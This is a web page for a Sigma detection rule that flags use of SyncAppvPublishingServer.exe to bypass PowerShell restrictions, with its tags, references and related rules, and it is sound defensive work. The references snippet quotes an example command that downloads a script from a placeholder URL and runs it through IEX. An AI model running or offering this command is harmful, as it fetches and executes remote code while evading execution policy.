SyncAppvPublishingServer Execution to Bypass Powershell Restriction
Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
Sigma rule (View on GitHub)
1title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction
2id: dddfebae-c46f-439c-af7a-fdb6bde90218
3related:
4 - id: fde7929d-8beb-4a4c-b922-be9974671667
5 type: derived
6 - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299
7 type: derived
8status: test
9description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
10references:
11 - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
12author: 'Ensar Şamil, @sblmsrsn, OSCD Community'
13date: 2020/10/05
14modified: 2022/12/25
15tags:
16 - attack.defense_evasion
17 - attack.t1218
18logsource:
19 product: windows
20 category: ps_script
21 definition: 'Requirements: Script Block Logging must be enabled'
22detection:
23 selection:
24 ScriptBlockText|contains: 'SyncAppvPublishingServer.exe'
25 condition: selection
26falsepositives:
27 - App-V clients
28level: medium
References
-
Example command on how inject Powershell code into the process SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Use caseUse SyncAppvPub...
Read More
Related rules
- Application Bypass with RunDLL32 and DllRegisterServer Function
- Rundll32 with Suspicious Export Functionalities
- Rundll32 with Suspicious Process Lineage
- Rundll32 without Command Line
- DLL Execution via Rasautou.exe